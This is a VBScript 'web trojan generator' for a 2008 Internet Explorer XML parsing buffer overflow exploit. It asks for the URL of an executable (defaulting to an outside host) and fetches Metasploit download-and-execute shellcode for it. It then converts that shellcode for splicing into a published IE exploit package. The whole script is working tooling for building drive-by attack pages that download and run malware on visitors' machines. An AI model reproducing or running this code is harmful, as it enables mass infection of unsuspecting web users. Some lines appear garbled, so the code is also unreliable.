网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

  'code by lcx

  On Error Resume Next

  Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )

  url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

  Body = getHTTPPage(url)

  Set Re = New RegExp

  Re.Pattern = "($shellcode =[sS]+

)"

  Set Matches = Re.Execute(Body)

  If Matches.Count>0 Then Body = Matches(0).value

  code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"

",""),Chr(10),""),".",""))

  function replaceregex(str)

  set regex=new regExp

  regex.pattern="\x(..)\x(..)"

  regex.IgnoreCase=true

  regex.global=true

  matches=regex.replace(str,"탑")

  replaceregex=matches

  end Function

  Function getHTTPPage(Path)

  t = GetBody(Path)

  getHTTPPage = BytesToBstr(t, "GB2312")

  End Function

  Function GetBody(url)

  On Error Resume Next

  Set Retrieval = CreateObject("Microsoft.XMLHTTP")

  With Retrieval

  .Open "Get", url, False, "", ""

  .Send

  GetBody = .ResponseBody

  End With

  Set Retrieval = Nothing

  End Function

  Function BytesToBstr(Body, Cset)

  Dim objstream

  Set objstream = CreateObject("adodb.stream")

  objstream.Type = 1

  objstream.Mode = 3

  objstream.Open

  objstream.Write Body

  objstream.Position = 0

  objstream.Type = 2

  objstream.Charset = Cset

  BytesToBstr = objstream.ReadText

  objstream.Close

  Set objstream = Nothing

  End Function

  Function URLEncoding(vstrIn)

  strReturn = ""

  For aaaa = 1 To Len(vstrIn)

  ThisChr = Mid(vStrIn,aaaa,1)

  If Abs(Asc(ThisChr)) < &HFF Then

  strReturn = strReturn & ThisChr

  Else

  innerCode = Asc(ThisChr)

  If innerCode < 0 Then

  innerCode = innerCode + &H10000

  End If

  Hight8 = (innerCode And &HFF00) &HFF

  Low8 = innerCode And &HFF

  strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

  End If

  Next

  URLEncoding = strReturn

  End Function

  set fso=CreateObject("scripting.filesystemobject")

  set fileS=fso.opentextfile("a.txt",2,true)

  fileS.writeline replaceregex(code)

  'fileS.writeline body

  wscript.echo replaceregex(code)

  files.close

  set fso=Nothing

  wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"